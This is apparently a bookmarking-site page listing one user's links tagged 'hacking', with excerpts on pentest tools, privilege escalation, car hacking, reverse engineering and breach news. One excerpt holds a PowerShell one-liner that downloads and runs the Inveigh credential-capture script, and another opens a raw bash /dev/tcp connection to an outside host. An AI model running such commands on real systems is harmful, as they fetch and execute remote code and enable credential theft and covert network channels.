recentpopularlog in

whip_lash : hacking   92

« earlier  
GitHub - mubix/post-exploitation-wiki: Post Exploitation Wiki
Post Exploitation Wiki. Contribute to mubix/post-exploitation-wiki development by creating an account on GitHub.
hacking  pentesting  github  postexploitation 
7 weeks ago by whip_lash
GitHub - zardus/preeny: Some helpful preload libraries for pwning stuff.
Preeny helps you pwn noobs by making it easier to interact with services locally. It disables fork(), rand(), and alarm() and, if you want, can convert a server application to a console one using clever/hackish tricks, and can even patch binaries!
binary  hacking  library  preload  ld_preload 
8 weeks ago by whip_lash
GitHub - TheSecondSun/Shellab: Linux and Windows shellcode enrichment utility
Shellab is a tool that can be used to improve existing shellcodes and adapt them for personal needs. Developed to provide an alternative to msfvenom with new functionalities. Suitable for both Windows and Linux shellcode (32 and 64 bit).
hacking  tool  shellcode  exploit  development 
12 weeks ago by whip_lash
Provadys Offensive Security Blog
Last May, Casey Smith pointed out on twitter and on his blog that the .NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables.

When reading this, first thing that came to mind was "if this works with elevated .NET processes, this would make a nice UAC bypass as well". And sure enough, it does.

This issue is still unfixed as of this writing – and may remain so – but is already public since July, as it was independently discovered, reported and published on Full Disclosure by Stefan Kanthak.
hacking  uac  windows  pentest 
december 2018 by whip_lash
GTFOBins
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. See the full list of functions.

This was inspired by the LOLBins project for Windows.
linux  pentesting  hacking  security  shell  privesc  privilegeescalation  gtfobins 
july 2018 by whip_lash
RedTeam_CheatSheet.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
july 2018 by whip_lash
Car Hacking: The definitive source
Instead of buying books or paying exorbitant amount of money to learn about car hacking, we (Charlie Miller and Chris Valasek) decided to publish all our tools, data, research notes, and papers to everyone for FREE! Feel free to reach out if you have any questions. If you're nice enough we may actually send you one of our IDBs ;)
car  hacking  security 
july 2018 by whip_lash
Malicious Network Traffic From /bin/bash - SANS Internet Storm Center
exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
cat <&5
exec 5>&-
bash  c2  networking  hacking  pentest  security  linux  postexploitation 
april 2018 by whip_lash
Introducing Metta: Uber’s Open Source Tool for Adversarial Simulation
Today, Uber announced the open-source release of Metta, a tool for basic adversarial simulation. Modern software techniques such as end-to-end functional testing and test-driven development work well for software design, and these same techniques can be applied to detection systems. In fact, Metta was born from multiple internal projects where we’d already brought DevOps concepts to our detection rules.
devops  hacking  opensource  security  purpleteam  metta 
march 2018 by whip_lash
Car Hacker's Handbook
Build an accurate threat model for your vehicle
Reverse engineer the CAN bus to fake engine signals
Exploit vulnerabilities in diagnostic and data-logging systems
Hack the ECU and other firmware and embedded systems
Feed exploits through infotainment and vehicle-to-vehicle communication systems
Override factory settings with performance-tuning techniques
Build physical and virtual test benches to try out exploits safely
books  car  cars  hacking  tools  security 
february 2018 by whip_lash
Practical Reverse Engineering Part 1 - Hunting for Debug Ports · Hack The World
In this series of posts we’re gonna go through the process of Reverse Engineering a router. More specifically, a Huawei HG533.
electronics  hacking  hardware  reverseengineering  security 
january 2018 by whip_lash
Introduction to reverse engineering and Assembly. | KaKaRoTo's Blog
I’ve always said that reverse engineering and ASM is “too complicated to explain” or that “If you need help to get started, then you won’t be able to finish it on your own” and various other vague responses—I often wanted to explain to others why I said things like that but I never found a way to do it. You see, when something is complex, it’s easy to say that it’s complex, but it’s much harder to explain to people why it’s complex.
assembly  hacking  programming  reverseengineering 
january 2018 by whip_lash
CTF Series : Vulnerable Machines — tech.bitvijays.com
This post (Work in Progress) records what we learned by doing vulnerable machines provided by VulnHub, Hack the Box and others. The steps below could be followed to find vulnerabilities, exploit these vulnerablities and finally become system/ root.
ctf  howto  hacking 
january 2018 by whip_lash
‘It Can’t Be True.’ Inside the Semiconductor Industry’s Meltdown - Bloomberg
Fogh and Gruss stayed up late at night discussing the theoretical basis for what would later become Spectre and Meltdown. But, like Prescher more than a year later, the Graz team was skeptical this was a real flaw. Gruss recalls telling Fogh that the chipmakers would have uncovered such a glaring security hole during testing and would never have shipped chips with a vulnerability like that.

YOU'D THINK
intel  hardware  bug  hacking 
january 2018 by whip_lash
Web Application Firewall (WAF) Evasion Techniques – secjuice™ – Medium
Why using ? instead of *? Because the asterisk (*) is widely used for comment syntax (something like /* hey I’m a comment */) and many WAF blocks it in order to avoid SQL Injection… something like UNION+SELECT+1,2,3/*
waf  hacking  pentest  security 
january 2018 by whip_lash
IoT Privacy and Security Challenges for Smart Home Environments
In the case of the quote above, hackers attempted to steal data from a North American casino through a fish tank that was connected to the internet. Although the casino had implemented some security precautions, these hackers still managed to compromise the tank to send data to a device in Finland before the threat was discovered and the perpetrators were stopped.

CONTINUOUS PERIMETER SCANNING. FIND THE FISH TANK BEFORE THE RUSSIANS DO.
iot  hacking  security 
january 2018 by whip_lash
Cracking Encrypted PDFs – Part 1 | Didier Stevens
In this series of blog posts, I’ll explain how I decrypted the encrypted PDFs shared by John August (John wanted to know how easy it is to crack encrypted PDFs, and started a challenge).

Here is how I decrypted the “easy” PDF (encryption_test).
pdf  hacking  pentest  security 
january 2018 by whip_lash
Code Used in Zero Day Huawei Router Attack Made Public | Threatpost | The first stop for security news
Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the past several weeks, is now public.
hacking  iot  botnet 
december 2017 by whip_lash
Inside the Hunt for Russia's Most Notorious Hacker | WIRED
Amazingly, more than two years later, the success has largely stuck: The botnet has never reassembled, though about 5,000 computers worldwide remain infected with Zeus malware. The industry partners are still maintaining the server sinkhole that’s swallowing up the traffic from those infected computers.
hacking  russia  botnet  zeus 
december 2017 by whip_lash
Unsecured Amazon S3 Bucket Exposes Details on 123 Million American Households
While the data belonging to the US Census Bureau —the 2010 census results — were already publicly available on the Bureau's Census website, the Experian data was never meant to be exposed.

The Experian data was stored in a file named "ConsumerView_10_2013.yxdb and contained what UpGuard researchers described as the "personally identifying details and data points about virtually every American household."
breach  hacking  s3 
december 2017 by whip_lash
Hacking the Hackers: Leveraging an SSRF in HackerTarget
I created another PHP file on my server that would redirect the API to the internal SMTP server and issue the valid SMTP commands!
ssrf  hacking  pentest 
december 2017 by whip_lash
Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure « Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure | FireEye Inc
Mandiant recently responded to an incident at a critical infrastructure organization where an attacker deployed malware designed to manipulate industrial safety systems. The targeted systems provided emergency shutdown capability for industrial processes. We assess with moderate confidence that the attacker was developing the capability to cause physical damage and inadvertently shutdown operations. This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack.
hacking  ics 
december 2017 by whip_lash
Hackers hit key ATM network in crime spree that clears $10 million | Ars Technica
Last year, online criminals used stolen SWIFT account credentials to steal $81 million from a bank in Bangladesh. Group-IB said the amount of information MoneyTaker has amassed on the Star, SWIFT, and AWS CBR networks raised the possibility the group may be planning more heists that target the interbank payment systems.
hacking  crime 
december 2017 by whip_lash
Researchers Find Trove of 1.4 Billion Breached Credentials - Infosecurity Magazine
This dump aggregates 252 previous breaches, including known credential lists such as Anti Public and Exploit.in, decrypted passwords of known breaches like LinkedIn as well as smaller breaches like Bitcoin and Pastebin sites

GET A COPY
passwords  hash  hacking 
december 2017 by whip_lash
Fox-IT reveals hackers hijacked its DNS records, spied on clients' files
Protect your website's DNS entries. Choose decent, unique passwords. Enable two-factor authentication on the account. And, if you have the clout, request that your DNS registrar confirm with a manual phone call if there is ever an attempt to point the records elsewhere.
dns  hacking  mitm 
december 2017 by whip_lash
Socks proxy servers scanning with nmap | Fun Over IP
A good way to collect your own proxy server list is to scan against (infected) ADSL/Cable users by choosing some ISP ranges from other countries.
proxy  socks  hacking  nmap 
september 2017 by whip_lash
Researcher Resources - Bounty Bug Write-ups - Security Research - Bugcrowd Forum
This is a collection of bug bounty reports that were submitted by security researchers in the infosec community. These write-ups are a great way to learn from fellow hackers.
bug  hacking  bugbounty  walkthrough  webapp  pentest  ctf 
august 2017 by whip_lash
Mind Maps
Information Security related Mind Maps
hacking  mindmap  security  pentest  ctf 
august 2017 by whip_lash
www.amanhardikar.com/mindmaps/Practice.html
PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
hacking  pentest  security  testing  lab 
june 2017 by whip_lash
Tor/Usage/Nmap-scan-through-tor - aldeid
The scans only work through Tor exit nodes with
.... 443 9030 s Exit Fast Running V2Dir Valid ...

You can search for an appropriate Exit Node on http://128.31.0.34:9031/tor/status/all
nmap  proxy  security  hacking  pentest 
june 2015 by whip_lash
« earlier      
per page:    204080120160

Copy this bookmark:





to read